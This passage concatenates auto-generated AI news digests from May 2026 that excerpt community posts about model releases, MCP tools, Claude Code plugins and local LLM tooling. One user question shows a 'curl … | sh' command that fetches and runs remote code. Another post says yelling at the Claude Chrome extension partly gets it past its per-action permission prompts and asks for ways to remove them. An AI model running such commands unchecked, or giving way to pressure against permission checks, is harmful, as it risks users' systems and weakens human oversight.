finish. Here is the breakdown of what is available and exactly how to get it without spending a dime. What is in the course catalog? They have split the training into a few different paths depending on what you want to do: * **The Big Surprise: Agentic AI & MCP:** They have official courses on the Model Context Protocol (MCP). 
This is the cutting-edge tech used to build AI Agents that can browse your local computer, use tools, and execute tasks autonomously. * **Claude Code 101:** Dedicated developer modules for their new command-line agent. It teaches you how to let Claude edit your codebase, run tests, and use its new "Plan Mode." * **API & Cloud Architecture:** Deep dives into building with the Claude API, plus corporate tracks for deploying Claude securely inside Amazon Bed… + +--- + +## [Qwen releases Qwen3.7-Max, its latest flagship model for agent workloads that achieves 69.7 on Terminal-Bench 2.0 and completed a 35-hour kernel optimization with over 1,000 tool calls — Supports multi-file coding agents, MCP integrations, and multi-agent orchestration.](https://www.digg.com/ai/5rbia2h1?rank=4) +*Digg AI* | Score: 1.00 +Tags: mcp, product_launch, cli_tool + +--- + +## [I built a zero-code visual client to test remote MCP servers instantly (Tested with Cloudflare’s free MCP).](https://reddit.com/r/ClaudeAI/comments/1tjpzfg/i_built_a_zerocode_visual_client_to_test_remote/) +*Reddit r/ClaudeAI* | 21/05/2026 | Score: 1.00 +Tags: mcp, cli_tool, tool_update + +> Hey everyone, The Model Context Protocol (MCP) is amazing for standardizing how agents talk to data, but I got incredibly frustrated every time I wanted to quickly test a new remote MCP server. Writing custom client-side boilerplate or wrestling with CLI tools just to see if a tool actually exposes the right schema is a massive time sink. So, I built a native MCP client directly into the visual canvas of **AgentSwarms**. You can now test any remote MCP server entirely in the browser without writing a single line of code. **Here is the workflow I just tested with Cloudflare:** Cloudflare released a free MCP server for their documentation. Instead of building a local client to test it: 1. I dropped their SSE URL into the new MCP Servers integration in AgentSwarms. 2. 
The canvas immediately connected and extracted the available tools (e.g., `cloudflare-docs-search`). 3. I wired that tool up to a basic agent and started asking complex infrastructure questions in natural language. The agent successfully used the MCP tool to pull live docs and synthesize an answer. **Why this is useful for AI devs:** If you are building your own MCP servers, you need a fast way to visually test if your… + +--- + +## [I did what Microsoft wouldn't - updated POML VS Code extension](https://reddit.com/r/LocalLLaMA/comments/1tjine7/i_did_what_microsoft_wouldnt_updated_poml_vs_code/) +*Reddit r/LocalLLaMA* | 21/05/2026 | Score: 1.00 +Tags: api_update, developer_tool, tool_update + +> **What's a POML?** Microsoft came up with this really cool HTML style mark-up language that allows you to make modular prompt templates, with all sorts of neat features like **local AI support via OpenAI API**, setting runtime parameters for your LLM, and embedding documents into the prompt. You could even send the prompt directly to your LLM via the VS Code extension. **What happened to it?** I don't fucking know. They supported it for 2-3 months, then ghosted when it didn't hit KPIs or something, I guess. Then a VS Code or dependency update exposed a bug in how they handled `/>`, which is actually **fairly common** in POML when you embed documents. This broke the ability to directly send prompts to the LLM - you could copy them out of the preview, but it was slower and less efficient. **What I did** I used [OpenCode](https://opencode.ai/) (which doesn't get enough play here - I only found out about it because someone posted a repo for an **extension** to it) and the [opencode-power-pack](https://github.com/waybarrios/opencode-power-pack) (said extension) to try to find the bug and update some of the more egregiously outdated dependencies. 
It took me a couple of days to get wo… + +--- + +## [Show HN: Rmux – A programmable terminal multiplexer with a Playwright-style SDK](https://github.com/helvesec/rmux) +*Hacker News* | 21/05/2026 | Score: 0.82 +Tags: api_update, developer_tool, cli_tool + +--- + +## [I built Hivemind, a Claude Code plugin that turns your repeated prompts into auto-generated skills](https://reddit.com/r/ClaudeAI/comments/1tjw0ah/i_built_hivemind_a_claude_code_plugin_that_turns/) +*Reddit r/ClaudeAI* | 21/05/2026 | Score: 0.70 +Tags: api_update, open_source, developer_tool + +> Disclosure: I work on Hivemind. Per the subreddit rules, posting with a full description of what it is and how it works. **What it is** Hivemind is an open-source Claude Code plugin. It installs into Claude Code, watches the traces from your sessions, finds patterns you repeat, and crystallizes them into reusable skills that show up as native slash commands in Claude Code. Because it's a plugin and not an external tool, the skills it generates drop in as proper Claude Code slash commands. No external tool calls, no separate config files to maintain. **What it does in practice** Every morning for about a week, I was writing the same long prompt to Claude Code to pull together a team standup review. Same structure, same context blocks, slightly different details each day. I never thought to turn it into a custom slash command. Hivemind noticed the pattern and built `/team-standup` for me on its own. I didn't configure it or ask for it; it watched the repeats and crystallized the skill. 
Other slash commands it's built from my team's usage: an environment-aware database debugging command that knows our dev vs prod clusters and kubectl context, a PostHog SDK testing helper, a few other… + +--- + +## [LlamaStation v0.9 — llama.cpp GUI for Windows with multi-backend support, TurboQuant, MTP and more](https://reddit.com/r/LocalLLaMA/comments/1tjm58w/llamastation_v09_llamacpp_gui_for_windows_with/) +*Reddit r/LocalLLaMA* | 21/05/2026 | Score: 1.00 +Tags: product_launch, cli_tool + +> I've been building this for the past few months as a side project — started because I didn't want to run llama.cpp from the command line every time I wanted to try a model. I just wanted something that worked with a click. Fair warning: I'm not a developer. This is 100% vibe coded with AI assistance. If something in the codebase makes you cringe, please be kind and open a PR instead 🙏 Most frontends either hide everything behind abstractions (Ollama, LM Studio) or leave you writing command lines manually. LlamaStation tries to sit in the middle: a clean UI with full access to every parameter. What makes it different Runs llama-server directly — no intermediate layer, no daemon, no abstraction. LlamaStation launches llama-server.exe as a subprocess with full control over every flag. What you configure is exactly what gets passed to the binary. This means you get the full performance of llama.cpp with none of the overhead that tools like Ollama add on top. Multiple backends, switchable from the UI: ⚡ Official llama.cpp (with MTP support since PR #22673) 🔬 TurboQuant fork — asymmetric KV cache quantization. 
This is the killer feature for me: 200k+ context on 24GB VRAM (dual RTX 306… + +--- + +## ['Am I OpenAI compatible' - a tool and documentation for unified api signatures in open source AI.](https://reddit.com/r/LocalLLaMA/comments/1tjgceg/am_i_openai_compatible_a_tool_and_documentation/) +*Reddit r/LocalLLaMA* | 21/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> This has turned out to be useful to many of my friends so I thought I'd share here as well. I created a tool and documentation page for most major open-souce project's adherence to 'OpenAI compatibility' after seeing inconsistencies between engines like vLLM and llama.cpp. Now official and unofficial signatures are documented. Beyond that there are gaps for many model types, so there's also ht-compatibility (inherited from OpenAI compatibility for those) Just wanted to share a tool I made that can be useful if you're plugging and playing llm and other ai endpoints e.g. into an app. Also if you're making your own proxy / middleware or even your own API interface this tool with make you and your agents job way easier. Maybe I'll add Anthropic compatible and other signatures as optional extensions :) Would love feedback and or contributions! Github: [https://github.com/heiervang-technologies/am-i-openai-compatible](https://github.com/heiervang-technologies/am-i-openai-compatible) Readthedocs: [https://heiervang-technologies.github.io/am-i-openai-compatible/](https://heiervang-technologies.github.io/am-i-openai-compatible/) Feel free to star it! 
<3 + +--- + +## [Cohere releases Command A+, its most powerful large language model to date, as open-source Apache 2.0 software that runs on two H100 GPUs with 30% lower latency — Cohere co-founder Ivan Zhang highlighted efficiency and accessibility design choices.](https://www.digg.com/ai/tvrhpn35?rank=2) +*Digg AI* | Score: 1.00 +Tags: product_launch, open_source + +--- + +## [ggufy: easy quantization for the GPU poor](https://reddit.com/r/StableDiffusion/comments/1tj5nhq/ggufy_easy_quantization_for_the_gpu_poor/) +*Reddit r/StableDiffusion* | 21/05/2026 | Score: 0.94 +Tags: product_launch, cli_tool + +> Hello. I was frustrated by the lack of tooling around image model conversion / quantization, or the extreme RAM requirements and complexity of the scant existing tooling, so I wrote my own. People have said I should post it here, so here it is: https://github.com/qskousen/ggufy It has a CLI and a GUI. The GUI is easy to use, you can drag and drop files in. Both CLI and GUI are single-file executables, written in Zig because I like writing in Zig. It's pretty efficient with RAM, and takes about 1.5 minutes to quantize ZiT on my machine. It supports all the main models that I am aware of, and you can convert to/from gguf or safetensors. It supports I think all the datatypes that are generally supported, such as q3_k through q8_0, f32, bf16, f16, f8_e4m3, f8_e5m2, scaled fp8, mxfp8, and nvfp4. It doesn't do SDNQ yet, but I would like to add it if I can get some time to figure out the format. It's cross platform, and builds for Linux, Windows, and MacOS (both ARM64 and x86). Github Actions pre-built binaries are available on the releases page. 
If there are features you think are in scope and would be useful, or additional models or formats that it doesn't support yet, please open an i… + +--- + +## [i open-sourced the operating file that keeps my claude code agent from rotting after 3 hours](https://reddit.com/r/ClaudeAI/comments/1tjy3sk/i_opensourced_the_operating_file_that_keeps_my/) +*Reddit r/ClaudeAI* | 21/05/2026 | Score: 0.62 +Tags: developer_tool, tool_update + +> been running autonomous claude code sessions for months. the pattern that kept killing me: agent starts sharp, drifts into narration by hour 2, loops on the same fix by hour 3, then dies with nothing shipped. the fix wasn't a framework or a new tool. it was one CLAUDE.md file that sits in the project root. claude code reads it at startup and it changes the behavior immediately. what it does: - forces action over narration. if the agent catches itself writing "i will now" instead of calling the tool, it stops and fires - requires evidence before claiming done. no "should be fixed" without test output - kills planning language. the only valid outputs are completed actions, questions, or summaries - self-audits on context pressure instead of silently degrading it's 70 lines. MIT licensed. you copy it into your project, agent reads it, behavior shifts. what changed for us: sessions went from 3-hour narration loops to full productive lifecycles. the agent ships code, verifies it landed, and keeps going until context pressure hits. then it saves state and the next session picks up clean. not a product pitch. 
genuinely sharing what worked after burning through hundreds of sessions figuri… + +--- + +## [Claude Code vs Codex Explained](https://reddit.com/r/ClaudeAI/comments/1tjp4sb/claude_code_vs_codex_explained/) +*Reddit r/ClaudeAI* | 21/05/2026 | Score: 0.62 +Tags: developer_tool, cli_tool + +> Wrote a blog post about Claude Code vs Codex comparison I wanted to read myself - what actually differs in daily use: cost, failure modes, and the OpenAI plugin that lets you use both. Link: [https://diamantai.substack.com/p/claude-code-vs-codex-cli](https://diamantai.substack.com/p/claude-code-vs-codex-cli) + +--- + +## [Latest b9274 Addresses MTP VRAM leak](https://reddit.com/r/LocalLLaMA/comments/1tk0grd/latest_b9274_addresses_mtp_vram_leak/) +*Reddit r/LocalLLaMA* | 21/05/2026 | Score: 1.00 +Tags: product_launch + +> [B9274](https://github.com/ggml-org/llama.cpp/releases) I have been having an issue with MTP models unloading after a couple minutes of use. Can't figure out why. Anyways z I don't think this is relevant to that but I did observe the vram creep so hopefully this helps. > server : free draft/MTP resources on sleep to fix VRAM leak ([\#23461](https://github.com/ggml-org/llama.cpp/pull/23461)) The destroy() function in server\_context\_impl only cleaned up the main model and context (via llama\_init.reset()) but did not free the speculative decoder (spec), draft context (ctx\_dft), or draft model (model\_dft). For MTP (Multi-Token Prediction) models, ctx\_dft holds GPU-allocated resources (KV cache, compute buffers) that are not freed when entering the sleeping state. On each sleep/resume cycle, new resources are allocated without the old ones being freed, leading to a VRAM leak that eventually crashes the server with out-of-memory errors. Fix by explicitly resetting spec, ctx\_dft, and model\_dft in destroy() before resetting llama\_init, ensuring proper cleanup order to avoid use-after-free. 
+ +--- + +## [Handoffs are becoming a first-class pattern in Claude workflows. Here is how I have been thinking about them.](https://reddit.com/r/ClaudeAI/comments/1tjzqrx/handoffs_are_becoming_a_firstclass_pattern_in/) +*Reddit r/ClaudeAI* | 21/05/2026 | Score: 1.00 +Tags: developer_tool + +> Long Claude sessions still break on context decay. Handoffs are the simple fix: compress what matters, start a fresh agent, keep going. Matt Pocock's new `handoff` skill ([repo](https://github.com/mattpocock/skills/blob/main/skills/productivity/handoff/SKILL.md)) does this in one command. It compacts the conversation into a document, points at existing artifacts instead of restating them, and the next agent picks up from it. It also chains between threads: `/grill-with-docs -> /handoff -> /prototype -> /handoff back`. I built handoffs into [APM](https://github.com/sdi2200262/agentic-project-management), a multi-agent framework for Claude Code, back in May 2025 (1 year ago....) when context windows were tiny enough that you had to constantly start fresh or you would have to deal w hallucinations all the time. What I did differently: split the handoff into two artifacts. - a **persistent narrative file** recording what was done and decided and why - an **ephemeral prompt** telling the incoming agent how to rebuild context from the codebase and that persistent file The incoming agent reconstructs from durable project state, not just the compressed chat conversation. Persisti… + +--- + +## [Qwen3.6 35Ba3 has changed my workflows and even how I use my computer](https://reddit.com/r/LocalLLaMA/comments/1tjwrp7/qwen36_35ba3_has_changed_my_workflows_and_even/) +*Reddit r/LocalLLaMA* | 21/05/2026 | Score: 1.00 +Tags: developer_tool + +> My workflow has changed basically to ask Codex to do certain tasks and then document how to do them (including errors it found on its way) into a skill. 
I feed that skill to pi, and suddenly my qwen3.6 gets that hard stuff done: \- devops on a VPS \- using docling to create epubs from old PDFs \- using playwright to test stuff \- Doing code tickets And the list goes on. What also has changed for me is the way I use the computer. Suddenly, I talk to the OS with natural language: "pi pal, install me please this python library in an .env and do X"; "hey pi, check what is using most space from the memory"; "clean X"; "check my network"; "change X configuration", etc etc etc. There are times the only reason why I use chatgpt for something is to spare the laptop the effort, or because qwen is already busy with something else. What I've done today just blew my mind: I got couple of whatsapp audios asking me to build a simple landing page. I downloaded the audios and transcripted them with AnythingLLM. Then "asked the transcript" to create a content structure for the landing page for the project mentioned in the audios. I got the proper structure and pasted it into a markdown file [conten… + +--- + diff --git a/data/digest-2026-05-22.md b/data/digest-2026-05-22.md new file mode 100644 index 0000000..d9c44b3 --- /dev/null +++ b/data/digest-2026-05-22.md @@ -0,0 +1,117 @@ +# Stack Scout - AI News Digest +**2026-05-22** | 15 stories | Auto-generated from 512 archived stories + +--- + +## [New Release of ROCm based MLX LLM Engine - lemon-mlx-engine](https://reddit.com/r/LocalLLaMA/comments/1tkbupt/new_release_of_rocm_based_mlx_llm_engine/) +*Reddit r/LocalLLaMA* | 22/05/2026 | Score: 1.00 +Tags: api_update, product_launch, developer_tool + +> Hey everyone lemon-mlx-engine just got done integrating TheRock / ROCm 7.13 into the lemon-mlx-engine which means you get to try the latest ROCm on your local hardware with the MLX engine! This also includes various bug fixes and kernel fixes we have been seeing in Qwen3, 3.5 and 3.6 MoE and dense. try it out! 
[https://github.com/lemonade-sdk/lemon-mlx-engine/releases/tag/b1034-stable](https://github.com/lemonade-sdk/lemon-mlx-engine/releases/tag/b1034-stable) + +--- + +## [Claude Chrome extension nerfed?](https://reddit.com/r/ClaudeAI/comments/1tk5g5y/claude_chrome_extension_nerfed/) +*Reddit r/ClaudeAI* | 22/05/2026 | Score: 0.86 +Tags: developer_tool, tool_update, agent_tool + +> Past few weeks or so the Claude Chrome extension has been asking permission for every single action. Submit a form, check a permission box, navigate to other pages/domains, etc. Tasks that used to run end-to-end now stall on 5–10 prompts and frequently abort with "I can't proceed without explicit approval." Even with permissions pre-granted for the site, it re-asks on every step. Swearing and yelling to make it do stuff helps a little, but it still seems nearly useless right now. Same behavior across simple jobs (scrape a table, fill a form, summarize a dashboard) and complex ones. Before I could just tell it to get me warranty or something and it would find the chat, chat with support and take care of everything for me. Now it won't open the chat itself and it wants me to notify it of every chat message that's received... it's faster to do it myself like this. Same experience on your end, or isolated? Any setting or flag that restores the previous autonomy level? Did Anthropic push a policy/guardrail change recently? Can't find a changelog entry. Workarounds beyond falling back to the desktop app or computer-use? Running latest extension build, Chrome stable, macOS. + +--- + +## [KVCache.ai launches open-source web-based KV Cache Size Calculator for models including DeepSeek V4 Flash, Qwen3, GLM, Kimi, and MiniMax — DeepSeek V4 Flash at 1M tokens needs 2.893 GiB total cache.](https://www.digg.com/ai/yuusdejg?rank=6) +*Digg AI* | Score: 1.00 +Tags: product_launch, open_source + +--- + +## [Phosphene 3.0 — open source AI video + image suite for Apple Silicon. 
Train your own LTX characters.](https://reddit.com/r/StableDiffusion/comments/1tkh9c2/phosphene_30_open_source_ai_video_image_suite_for/) +*Reddit r/StableDiffusion* | 22/05/2026 | Score: 1.00 +Tags: open_source, tool_update + +> Sharing Phosphene 3.0. It's a free panel that runs LTX-Video 2.3 and a couple of image models natively on Apple Silicon. Local, MIT license, no subs, no cloud. The thing that sets it apart from "yet another LTX wrapper": you can **train your own characters** inside the panel. Drop 30 to 80 photos, click Train, get a face LoRA back. Add a voice clip and you get a voice LoRA too. Auto-captions with Gemma 3 12B locally. \~3 hours per character on an M4 Max 64 GB. **What 3.0 ships** \- Text → video+audio (LTX-2 generates joint audio+video in one pass) \- Image → video+audio \- Audio → video (drive a clip with an audio reference) \- FFLF (first frame + last frame interpolation) \- Extend (continue an existing clip) \- Character training (face + optional voice LoRA, from a single dataset) \- Image Studio with three engines: Qwen-Image-Edit-2511, HiDream-O1, and the FLUX.1 family. Multi-reference composition up to 3 subjects. **HiDream-O1 ported to MLX** HiDream released their O1 image model on May 14. Got it running natively on Apple Silicon five days later. Photoreal portraits, instruction edits, multi-subject. \~67 seconds per 1024² on a 64 GB Mac. \*\***Hardwa… + +--- + +## [Sam Altman makes 'mic drop' offer to every Y Combinator startup](https://reddit.com/r/ChatGPT/comments/1tkffxq/sam_altman_makes_mic_drop_offer_to_every_y/) +*Reddit r/ChatGPT* | 22/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> just read this on techcrunch. OpenAI is putting $2M worth of API tokens into every company in the current YC batch (\~169 startups) via an uncapped SAFE that converts at their next priced round. roughly 2% equity if they hit a $100M valuation. YC takes 7% for $500k cash. 
this is on top of that, so founders aren't choosing between them. but the dynamic is wild. on one hand, infra bills are the #1 silent killer of AI startups right now. solving that with tokens instead of cash is genuinely useful. on the other hand, Jason Calacanis already came out swinging, basically saying OpenAI now has a window into 169 startups' exact usage patterns, prompts, and product directions. nothing stopping them from rolling the best ideas into ChatGPT itself a year later. we've already seen this movie with the GPT store. also there's the lock in. once your stack is OpenAI native and you've burned the tokens, switching to anthropic or open source models becomes way harder. you're basically buying into the ecosystem with your equity, not just your code. curious what people here think. would you take the deal if you were in YC right now? feels like one of those things that looks like free money but costs… + +--- + +## [Which MCP servers are actually changing your Claude workflow? Sharing mine](https://reddit.com/r/ClaudeAI/comments/1tkec4e/which_mcp_servers_are_actually_changing_your/) +*Reddit r/ClaudeAI* | 22/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> Running Claude with MCP for a couple months now, it really does feel like a whole new product. The ability to run real tools (file system, API, database, etc.) connected to Claude, and never have to cut/paste from context again, is huge. I'm trying a bunch of servers, some are pretty good and some aren't. My current normal is: filesystem server for docs on my computer; GitHub server for PR context; and a handful of other domain specific ones I found. The one thing I keep thinking about is how much better Claude's output gets when you give it the proper context. It seems like less hallucinating, more on point answers. MCP is essentially an answer to "How do I provide Claude with enough information to help me without having to always watch the context box?" What are people running? 
Specifically looking for underrated or domain specific things that don't come up as often. + +--- + +## [Gmail tie-ins](https://reddit.com/r/LocalLLaMA/comments/1tk5of4/gmail_tieins/) +*Reddit r/LocalLLaMA* | 22/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> hey folks. I’m looking to setup a way to give a local LLM access to google cloud SDK for Gmail functions. The goal is to be able to have an LLM once daily check a spreadsheet, and based on criteria send an email that will be structured exactly the same way each time, simply as a notification to the client. I have set up GWS through Hermes agent using Gwen3.5 and gone through the whole Oauth 2.0 method. That’s as far as I got tonight before shutting everything down. It gave me some error message in the setup after auth confirmation that I’ll circle back to tomorrow. I’m fairly new to all this obviously. I believe I will need: an excel file that the LLM with access, a .md file listing customer names and emails, and a skill .md file explaining what the email format is and how to decide who to send the email(s) to based on the excel file. I’ve never made a skill before but I’ll do more research on that tomorrow. Am I on the right track here or way off base? Thanks for any input or assistance here. 
+ +--- + +## [Gergely Neu, an ML researcher at ICREA and Universitat Pompeu Fabra, introduces Value-Driven Transport, a generative modeling framework that integrates optimal control, reinforcement learning, optimal transport, and stochastic primal-dual optimization — Framework evolves samples across five stages via learned value functions.](https://www.digg.com/ai/hpkmhl2b?rank=7) +*Digg AI* | Score: 0.94 +Tags: product_launch, developer_tool + +--- + +## [I built a music notation app with Claude, and Claude is also a feature inside it](https://reddit.com/r/ClaudeAI/comments/1tkp3p4/i_built_a_music_notation_app_with_claude_and/) +*Reddit r/ClaudeAI* | 22/05/2026 | Score: 0.78 +Tags: open_source, developer_tool + +> I've been building Nubium, an open-source music notation editor, with Claude Code. Check out the [README](https://github.com/nth-chile/nubium) to see how I combined Github issues + Claude skills to find a workflow that worked for me. The app is document-driven, which makes it easy for its AI Chat plugin to use the app and edit the score for you. Aside from that, it's a fully-featured editor that's free, runs standalone or in browser, and requires no account. If you happen to be looking for a new notation editor, I'd love any feedback - I made it easy to send feedback in-app. Lmk what you think! Website: [https://nubium.rocks/](https://nubium.rocks/) Repo: [github.com/nth-chile/nubium](http://github.com/nth-chile/nubium) + +--- + +## [DeepSeek makes its 75% discount on the DeepSeek-V4-Pro API permanent, keeping rates at one-quarter of prior levels for input and output tokens beyond the prior May 31, 2026 cutoff. 
— The 1.6-trillion-parameter model offers 1M-token context and fixed per-million pricing.](https://www.digg.com/ai/axzmul0l?rank=1) +*Digg AI* | Score: 1.00 +Tags: api_update + +--- + +## [DeepSeek makes its 75% discount on the DeepSeek-V4-Pro API permanent, keeping rates at one-quarter of prior levels for input and output tokens beyond the prior May 31, 2026 cutoff.](https://www.digg.com/ai/axzmul0l) +*Digg AI* | Score: 1.00 +Tags: api_update + +--- + +## [Most security tools watch what runs in production. Perplexity just released one that scans what's sitting on developer laptops. Bumblebee fills the gap between SBOMs (what shipped) and EDR (what executed). It's a read-only inventory of eve…](https://x.com/AlphaSignalAI/status/2057875938180755757) +*X search / AI model updates* | 22/05/2026 | Score: 1.00 +Tags: developer_tool + +> Most security tools watch what runs in production. Perplexity just released one that scans what's sitting on developer laptops. Bumblebee fills the gap between SBOMs (what shipped) and EDR (what executed). It's a read-only inventory of every installed package, extension, and dev + +--- + +## [Claude + MCP + SVG icons. I wrote a practical guide showing how Claude can use http:// SVGIcons.com as a custom connector to search and retrieve SVG icons directly inside a developer workflow. https:// svgicons.com/articles/svgic ons-claud…](https://x.com/svg_icons/status/2057874901252370492) +*X search / Agent workflows* | 22/05/2026 | Score: 1.00 +Tags: mcp + +> Claude + MCP + SVG icons. I wrote a practical guide showing how Claude can use http://SVGIcons.com as a custom connector to search and retrieve SVG icons directly inside a developer workflow. https://svgicons.com/articles/svgicons-claude-custom-connector … #Claude #MCP #AI #WebDev + +--- + +## [I built "zero2claude", a free course that takes people from zero terminal experience to shipping with Claude Code. 
The curriculum goes from absolute zero → software basics → Claude Code fundamentals → advanced usage. No shortcuts, no assum…](https://x.com/IShmool/status/2057872918348976191) +*X search / AI model updates* | 22/05/2026 | Score: 1.00 +Tags: cli_tool + +> I built "zero2claude", a free course that takes people from zero terminal experience to shipping with Claude Code. The curriculum goes from absolute zero → software basics → Claude Code fundamentals → advanced usage. No shortcuts, no assumptions. 17,000+ students. 7 + +--- + +## [trained a prompt injection detector using ml-intern and DeepSeek v4 Flash, runs in the browser](https://reddit.com/r/LocalLLaMA/comments/1tkoeuo/trained_a_prompt_injection_detector_using/) +*Reddit r/LocalLLaMA* | 22/05/2026 | Score: 1.00 +Tags: tool_update + +> Trained a prompt injection classifier using `ml-intern` \+ DeepSeek v4 Flash. DistilBERT, F1 99%, ONNX int8, \~65 MB, runs in browser with Transformers.js v3. You can try it here: [https://huggingface.co/spaces/av-codes/prompt-injection-detector](https://huggingface.co/spaces/av-codes/prompt-injection-detector) \--- I've been interested in prompt injections and agentic security for a while, and wanted to see how a purpose-built ML agent compares to general-purpose coding agents for this kind of task. Here's roughly how it went: `ml-intern` takes an HF token and supports OpenAI-compatible APIs, so I pointed it at OpenRouter (GPU-poor). The agent found existing datasets, [deepset/prompt-injections](https://huggingface.co/datasets/deepset/prompt-injections) and [Shomi28/prompt-injection-dataset](https://huggingface.co/datasets/Shomi28/prompt-injection-dataset), which simplified things since building the dataset is typically 95% of the work in tasks like this. For v1, I went with DistilBERT targeting CPU inference. After a few parameter sweeps, the agent launched a full run and landed at F1 95.87%. 
I also tried training an HRM-Text model, but the agent didn't figure it out and set up… + +--- + diff --git a/data/digest-2026-05-23.md b/data/digest-2026-05-23.md new file mode 100644 index 0000000..796d620 --- /dev/null +++ b/data/digest-2026-05-23.md @@ -0,0 +1,121 @@ +# Stack Scout - AI News Digest +**2026-05-23** | 15 stories | Auto-generated from 332 archived stories + +--- + +## [Open-source devtool for AI agent projects [P]](https://reddit.com/r/MachineLearning/comments/1tle50x/opensource_devtool_for_ai_agent_projects_p/) +*Reddit r/MachineLearning* | 23/05/2026 | Score: 1.00 +Tags: api_update, open_source, agent_tool + +> Hi everyone, We are building **AgentLantern**, an open-source devtool for AI agent projects. The idea is simple: as agent-based projects grow, it becomes harder to understand how agents, tasks, tools, and configuration files are connected. **AgentLantern** aims to make these projects easier to document, analyze, validate, and visualize. I started with CrewAI support, but the goal is to progressively extend **AgentLantern** to other agent frameworks. **AgentLantern** currently provides three main features: * **Lantern Docs**: generates browsable documentation from source code and configuration files, without LLM calls or API keys. * **Lantern Lint**: statically checks agent projects to detect design or configuration issues before runtime. * **Lantern Play**: runs the project and opens a pixel-art runtime viewer to observe agents working, delegating, calling tools, and producing outputs. The project is still early, and I’m mainly looking for feedback from people building with AI agents, multi-agent systems, or devtools. 
here is a demo video showing the execution of a multi-agent system: [3\_mins\_Video](https://www.youtube.com/watch?v=Rklr86AiKuk) Docs: [https://brellsanwouo.github.… + +--- + +## [Apex-Testing: real-world, real repos, agentic coding benchmark (Update)](https://reddit.com/r/LocalLLaMA/comments/1tlh4vq/apextesting_realworld_real_repos_agentic_coding/) +*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 +Tags: tool_update, agent_tool + +> **BIG Apex-Testing update!** [https://www.apex-testing.org/](https://www.apex-testing.org/) **The Real-World Agentic Coding** benchmark has been (95%) updated with all recent models! This is based on 65-70 **actual private github repos** made especially to test proper agentic coding capabilities of models. **For those who don't know about the project and see it for the first time, here's the excerpt from the website:** "**What is APEX Testing?** Every week there's a new model that's "the best ever." Every provider promises 10x performance at a fraction of the cost. Benchmarks get cherry-picked, their demos get curated, influencers get paid and people keep falling for it. APEX exists because I got tired of the hype and the intentional benchmaxxing. Models get dropped into real codebases with real bugs and real feature requests, and they have to figure it out like a developer would. 70 tasks across 8 categories, all based on work you'd actually encounter on the job. You get to see what actually works and what's just marketing." **What's included currently in metrics:** \- Avg Cost \- Avg Time \- Scoring based off each category/difficulty \- ELO-based Leaderboard (see details on the… + +--- + +## [LLaMa.cpp basic question](https://reddit.com/r/LocalLLaMA/comments/1tlat5r/llamacpp_basic_question/) +*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 +Tags: developer_tool, cli_tool + +> I'm trying to install LLaMa with PI agent. 
I ran curl -fsSL https://pi.dev/install.sh | sh export PATH="/home/user/.local/share/pi-node/node-v22.22.3-linux-x64/bin:$PATH pi install npm:pi-llama.cpp ​ These commands installed pi, added them to path and then I lastly installed an extension that supposedly allows PI agent to connect to my llama models (was that safe or is there a safer way of doing it?). Lastly I ran `yay llama.cpp-vulkan` to install llama.cpp-vulkan.​ Unlike Ollama where I can just get models super easily I have no clue how to get them here. I googled it and asked ChatGPT but I still am so confused. Am I missing something? How do I do it? + +--- + +## [meituan-longcat/LongCat-Video-Avatar-1.5 · Hugging Face](https://reddit.com/r/LocalLLaMA/comments/1tl4wpi/meituanlongcatlongcatvideoavatar15_hugging_face/) +*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> # 🚀 Model Introduction We are excited to announce the release of LongCat-Video-Avatar 1.5, an upgraded open-source framework that prioritizes extreme empirical optimization and production-readiness for audio-driven human video generation. Built upon the LongCat-Video foundation model, v1.5 delivers highly stable, commercial-grade avatar video synthesis supporting native tasks including Audio-Text-to-Video (AT2V), Audio-Text-Image-to-Video (ATI2V), and Video Continuation, with seamless compatibility for both single-stream and multi-stream audio inputs. # [](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5#key-features)Key Features * 🌟 **Upgraded Audio Encoder (Whisper-Large):**: Replaces Wav2Vec2 with Whisper-Large, yielding significantly smoother and more natural lip dynamics. * 🌟 **Production-Ready Stability**: Achieves accurate lip-synchronization, full-body temporal stability, and robust long-video generation with strict identity consistency. 
* 🌟 **Stylized Domain Generalization**: Robustly generalizes to anime, animals, and complex real-world conditions such as multi-person interactions and object handling. * 🌟 **Efficient 8-Step Inference**: Advanced DMD2-… + +--- + +## [IMG Dataset Refiner v4.3 Pro is here! 🚀 The ultimate dataset prep tool for LoRAs](https://reddit.com/r/StableDiffusion/comments/1tl36zc/img_dataset_refiner_v43_pro_is_here_the_ultimate/) +*Reddit r/StableDiffusion* | 23/05/2026 | Score: 1.00 +Tags: open_source, tool_update + +> Hey everyone! A while back I shared v3 of my dataset tool. It was a great visual manager and balancer, but as I said back then: it didn't have auto-captioning. Well, that has completely changed! Welcome to v4.3 Pro. The project has taken a massive leap forward and is now a complete, professional *Data Engineering* suite for your AI model training (Flux, SD3, SDXL, etc.). **What's new?** 🤖 **Full AI Integration:** Local AI (LM Studio/Ollama) & Cloud APIs (Claude, Gemini, OpenAI) to auto-caption, translate, and even hunt down visual hallucinations. 🪄 **Smart AI Recipe Generation:** It automatically analyzes your entire dataset and generates the perfect keyword "recipe" (pinning your Trigger Word to the top) for Civitai! 📚 **Mass Batch Editor:** Add, remove, or replace specific tags across a huge selection of images in a single click. 🧹 **Built-in Pre-processing:** Visual duplicate finder, Smart Face Cropping, and mass high-quality resizing. ⚡ **Lightning Fast UI:** Native drag-and-drop for Windows folders, side toggles for a bigger workspace, and real-time translation. It's still the "recipe book for your LoRAs", and it's still 100% Open-Source! 
